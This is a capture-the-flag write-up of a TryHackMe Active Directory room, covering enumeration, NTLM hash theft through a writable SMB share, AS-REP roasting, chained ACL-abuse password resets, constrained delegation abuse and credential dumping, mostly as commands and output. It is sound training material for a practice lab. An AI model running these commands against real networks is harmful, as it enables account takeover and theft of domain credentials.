Reset | THM
Difficulty = Hard
My First ever CTF on Active Directory, Please make sure to leave feedbacks,If you have any doubts or questions š
Running our nmap scan we have
# Nmap 7.94SVN scan initiated Wed Jan 31 04:09:08 2024 as: nmap -p- -T4 -v --min-rate=1000 -sCV -oN nmap.txt -Pn 10.10.94.182
Nmap scan report for 10.10.94.182
Host is up (0.13s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-31 03:11:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-01-31T03:12:53+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Issuer: commonName=HayStack.thm.corp
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-25T21:01:31
| Not valid after: 2024-07-26T21:01:31
| MD5: 1593:b46f:8770:a73a:9649:f3ec:e9ad:c968
|_SHA-1: 9d45:4568:8ee5:2758:e3cc:26ff:e0ca:23db:5ae6:017e
| rdp-ntlm-info:
| Target_Name: THM
| NetBIOS_Domain_Name: THM
| NetBIOS_Computer_Name: HAYSTACK
| DNS_Domain_Name: thm.corp
| DNS_Computer_Name: HayStack.thm.corp
| DNS_Tree_Name: thm.corp
| Product_Version: 10.0.17763
|_ System_Time: 2024-01-31T03:12:13+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-31T03:12:17
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 31 04:12:57 2024 -- 1 IP address (1 host up) scanned in 229.63 seconds
RPC Enumeration (135)
- Enumerating RPC we get error
NT_STATUS_ACCESS_DENIEDmeaning we donāt have enough permissions to view files as a NULL user
DNS Enumeration (53)
- Go ahead and add the FQDN
HayStack.thm.corpand root domainthm.corpto your/etc/hostsfile
- Performing a zone transfer attack, looks like we donāt have DNS Replication enabled
SMB Enumeration (139/445)
- This was done with
smbclient, we have READ, WRITE permissions in theDatashare
smbclient -L \\\\10.10.94.182\\
smbclient \\\\10.10.94.182\\Data
put <location_of_any_file>
- Checking the
onboardingdirectory, looks like the files are been changed, so there must be an active user on this session
- using this article, i was made to understand that if we could put files into a share, we can try to steal password hashes using a tool called NTLM_Theft and Responder
git clone https://github.com/Greenwolf/ntlm_theft
pip3 install xlsxwriter
FootHold
- Now go ahead and run this tool with the following syntax
cd ntlm_theft
python3 ntlm_theft.py -g all -s <ATTACKER-IP> -f test
# -g:Ā generate. Here, we specify the file types (for related attacks) to generate
# -s:Ā The IP address of our Kali machine, In this case (tun0)
# -f:Ā filename
- We can go ahead and upload the
.lnkfile to our target share, but before that start up our listenerresponder
sudo responder -I tun0
- As seen above we captured the NTLMv2 hash for user
automate, we can then go ahead and crack this hash using JTR
john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
automate:Passw0rd1
- We canāt login via
psexec.pyfor some reasons
- We can then login with
Evil-WinRMand get user.txt
evil-winrm -i 10.10.94.182 -u automate -p <PASSWORD>
- Since my
Evil-WinRMshell is kinda slow and unstable, also deletes mySharpHound.exeand no time to find whitelisted folders by AV :P, I decided to usebloodhound-python
bloodhound-python -ns 10.10.94.182 --dns-tcp -d THM.CORP -u <username> -p <password> -d domain.local -c all --zip
- Uploading our data to bloodhound and looking for path to
DOMAIN ADMINS@THM.CORP
- Made more enumeration and found AsRepRoastable users in which user
ERNESTO_SILVA@THM.CORPis an high value target
- Using
Impacket-GetNPUserswe can go ahead and retrive thekrb5asrephash for each users respectively
impacket-GetNPUsers -request -format john -no-pass thm.corp/ERNESTO_SILVA
- Unfortunately, the only user in which their hash could be cracked is
TABATHA_BRITT
marlboro(1985):TABATHA_BRITT@THM.CORP
looks like TABATHA_BRITT can also do the job
Got same access denied error and i couldnāt load tools, even using dacledit.py gave me alot of errors, Here are 2 resource to help if you wanna go down this path though -:
- https://www.adamcouch.co.uk/dacl-trouble-genericall-on-ous/
- Youtube_Installing_dacledit.py_In_Kali_Linux
./dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'CECILE_WONG' -target-dn 'OU=SERVICEACCOUNTS,OU=FSR,OU=TIER 2,DC=THM,DC=CORP' HAYSTACK.THM.CORP/TABATHA_BRITT:'marlboro(1985)'
- Navigating back to
BloodHoundfor more enumeration through the user path,TABATHA_BRITT, We have an ACE abuse path to userDARLA_WINTERS
- Then user
DARLA_WINTERShas constrained delegation enabled on the CIFS Service
CIFS- Common Internet File System is used for file sharing that allows delegation of users to shares.
Exploit
- From user
TABATHA_BRITTwe haveSHAWNA_BRAYGenericAll ACE, we can go ahead and exploit this by changing the userSHAWNA_BRAYPassword
net rpc password "SHAWNA_BRAY" "newP@ssword2022" -U "THM.CORP"/"TABATHA_BRITT"%"marlboro(1985)" -S "HayStack.thm.corp"
- We then have
ForceChangePasswordto userCRUZ_HALL, we can go ahead and change this users password also
net rpc password "CRUZ_HALL" "newP@ssword2022" -U "THM.CORP"/"SHAWNA_BRAY"%"newP@ssword2022" -S "HayStack.thm.corp"
- Then for our last user which is
DARLA_WINTERSwe have GenericWrite ACE from userCRUZ_HALL, we can go ahead and change and change the password on this user also
net rpc password "DARLA_WINTERS" "newP@ssword2022" -U "THM.CORP"/"CRUZ_HALL"%"newP@ssword2022" -S "HayStack.thm.corp"
- We can then go ahead and login to user
DARLA_WINTERSto enumerate the constrained delegation we found on the CIFS service
xfreerdp /v:HayStack.thm.corp /u:DARLA_WINTERS /p:'newP@ssword2022'
- Unfortunately for us, we canāt load tools and i am not ready for some AV evasion on a CTF š¤£, Anyways i found this two resources to be helpful for me on abusing constrained delegation using Kali
- https://wadcoms.github.io/wadcoms/Impacket-getST-Creds/
- https://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html
- First of all retrieve a ticket for an impersonated user to the service we have delegation rights to using
impacket-getST
impacket-getST -spn cifs/HayStack.thm.corp -dc-ip 10.10.200.9 -impersonate Administrator thm.corp/DARLA_WINTERS:'newP@ssword2022'
- Now export this file into a variable called
KRB5CCNAME
export KRB5CCNAME=Administrator.ccache
- We can then go ahead and dump the SAM archive of the DC, āHaystack.thm.corpā, using
impacket-secretsdump
impacket-secretsdump -k -no-pass HayStack.thm.corp
- I couldnāt login with the Administrator hash so i decided to use
CECILE_WONGaccount which is also in the Domain Admins group on the DC
- Go ahead and login via
Evil-WinRMand retrieve the Admin flag
Arigatou gozaimasu š
